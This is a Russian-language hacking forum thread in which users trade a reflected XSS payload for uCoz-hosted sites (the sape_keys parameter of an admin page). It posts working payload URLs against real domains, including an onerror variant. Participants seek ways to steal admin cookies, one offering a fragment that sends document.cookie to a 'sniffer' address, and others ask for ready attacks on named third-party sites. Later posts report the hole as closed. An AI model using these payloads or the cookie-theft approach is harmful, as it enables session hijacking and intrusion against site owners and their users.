Просмотр полной версии : Ucoz xss
Вот xss найденная мною на юкозе:
[site.ucoz.ru]/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript: alert()%3E
Пример:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript: alert()%3E
-m0rgan-
28.12.2008, 22:57
Ыыыыыыы))))
Юкоз пахекали=)))
http://www.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript: alert()%3E
:D:D:D
Малаца, держи канфетко=)
yje prikrili??? lol
неправда всё работает)
-m0rgan-
28.12.2008, 23:18
В Опере все гуд!
пробел надеюсь не забыл убрать, двдрв?)
ога..под ие6 пашет...под фф не хочет ^_^
Xcontrol212
29.12.2008, 04:53
ff не пашет,на ие 5 и опера 9.62 пашет!
давайте мот перенесём в приват))
Sasuke-kun
29.12.2008, 22:05
Уже не пашет =(
-m0rgan-
29.12.2008, 22:39
Sasuke-kun, че у тебя не пашет???)
Все там пашет!!!111адинадинадин
Пробелы убери прост :D:D:D
дайте пример на сайт prostota.ucoz.org, уж очень хочется посмотреть, а то смотрю и не пашет(
всё, понял, а как с ней увести пароль как то можно? снифером трудно будет
-m0rgan-
29.12.2008, 23:07
Пробуй так:
alert(адрес снифера+document.cookie)
Sasuke-kun
29.12.2008, 23:19
хм..а у меня не пашет,можите дать готовый пример например к сайту naruto-fan.ru он на ucoz'е
Для Mozilla Firefox, Opera и некоторых других браузеров успешно работает такая конструкция:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")>
Alexandr II
29.12.2008, 23:39
всё пашет и пашет нормально ;) заслужил +
Все по прежнему работает.
НО как с этим угнать куки админа ? :(
:( жаль только пользы от этого мало. куки не выходит угнать
luz3r
И кукисы на снифер приходят?
favor_it
03.01.2009, 20:41
Дык я не понял, должна стоят сапа?
DeepBlue7
03.01.2009, 21:12
ЫЫЫЫЫЫЫ ))) Накнецто ХОТЬ ЧТОТО на уцозе нашли и в паб выложили =)
кукисы, получилось, у кого-нить угнать? :)
Крутая у вас, ребят, уязвимость через которую ничего сделать нельзя. Да еще и связанная больше с sape чем с юкозом.
Если правильно написать ссылку, то все получается. Уязвимость нормальная.
можете привести конкретный пример на конкретном сайте?просто мне очень нужно!
P.S. "репутации" нет а то + бы поставил
можете привести конкретный пример на конкретном сайте?просто мне очень нужно!
никто тут не собирается ничего приводить, тут только пустозвонить гаразды.... никто даже не посмотрел что на 404 ошибке в юкозе сапа уже не выводится, а значит некуда лепить эту пассивную XSS....
Еще... Кража кука ничего не даст, его нельзя ни расшифровать ни использовать у себя на компьютере....
Во всех ваших примерах пишет
Невозможно найти ресурс
Возможно, он был удален, переименован, или временно недоступен.
Во всех ваших примерах пишет
Невозможно найти ресурс
Возможно, он был удален, переименован, или временно недоступен.
Уязвимость прикрыли.
Да реал, краша куки вам ничего не даст. По умолчанию на Укозе у админа стоит привязка к IP. А следовательно куки если и прилетят, то толку от них нет.
Да реал, краша куки вам ничего не даст. По умолчанию на Укозе у админа стоит привязка к IP. А следовательно куки если и прилетят, то толку от них нет.
А если у нас динамический IP? Как куки спистеть то?)) Юзал поиск, все темы нечего конкретного... ща работает какой-нить способ?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot